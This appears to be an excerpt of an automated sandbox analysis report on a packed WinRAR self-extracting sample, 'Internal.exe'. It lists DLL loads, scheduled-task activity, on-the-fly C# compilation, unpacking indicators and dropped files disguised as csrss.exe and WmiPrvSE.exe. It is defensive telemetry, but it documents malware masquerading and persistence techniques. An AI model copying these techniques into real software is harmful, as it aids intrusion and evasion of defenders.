                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: mscoree.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: version.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: uxtheme.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: windows.storage.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: wldp.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: profapi.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: cryptsp.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: rsaenh.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: cryptbase.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: sspicli.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: mscoree.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: version.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: uxtheme.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: windows.storage.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: wldp.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: profapi.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: cryptsp.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: rsaenh.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: cryptbase.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: version.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: version.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: sspicli.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: mscoree.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: version.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: uxtheme.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: windows.storage.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: wldp.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: profapi.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: cryptsp.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: rsaenh.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: cryptbase.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\Internal.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: Internal.exeStatic file information: File size 3265288 > 1048576
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Internal.exe, Internal.exe, 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.pdb source: AgentMonitor.exe, 00000006.00000002.1759873239.00000000031DA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.pdb source: AgentMonitor.exe, 00000006.00000002.1759873239.00000000031DA000.00000004.00000800.00020000.00000000.sdmp

                                    Data Obfuscation

                                    barindex
                                    Detected unpacking (changes PE section rights)
                                    Source: C:\Users\user\Desktop\Internal.exeUnpacked PE file: 1.2.Internal.exe.4f0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.rsrc:EW;Unknown_Section7:EW;cheat:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:W;Unknown_Section4:R;Unknown_Section5:R;.rsrc:EW;Unknown_Section7:EW;cheat:EW;
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline"
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline"
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline"Jump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline"Jump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeFile created: C:\Blockcomcrt\__tmp_rar_sfx_access_check_4728968Jump to behavior
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name: cheat
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_005281CD push esi; ret 1_2_005281D6
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0050F640 push ecx; ret 1_2_0050F653
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0050EB78 push eax; ret 1_2_0050EB96
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_00583104 push ecx; mov dword ptr [esp], edx1_2_00583109
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0058719C push ecx; mov dword ptr [esp], edx1_2_0058719E
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0057728C push 005776D8h; ret 1_2_005776D0
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0058332C push ecx; mov dword ptr [esp], edx1_2_00583331
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0056F3EA push 0056F418h; ret 1_2_0056F410
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_005803A0 push 00580400h; ret 1_2_005803F8
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0056F45C push 0056F488h; ret 1_2_0056F480
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_00581454 push 005814A1h; ret 1_2_00581499
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_00580456 push 005805A4h; ret 1_2_0058059C
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_00583448 push ecx; mov dword ptr [esp], edx1_2_0058344D
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0058D40C push ecx; mov dword ptr [esp], edx1_2_0058D411
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0056F424 push 0056F450h; ret 1_2_0056F448
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0056F4F8 push 0056F52Ch; ret 1_2_0056F524
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0056F494 push 0056F4C0h; ret 1_2_0056F4B8
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0058348C push ecx; mov dword ptr [esp], edx1_2_00583491
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0058554C push ecx; mov dword ptr [esp], edx1_2_0058554D
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0057F536 push 0057F5B5h; ret 1_2_0057F5AD
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0056D5F0 push 0056D641h; ret 1_2_0056D639
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0057E62C push 0057E6A2h; ret 1_2_0057E69A
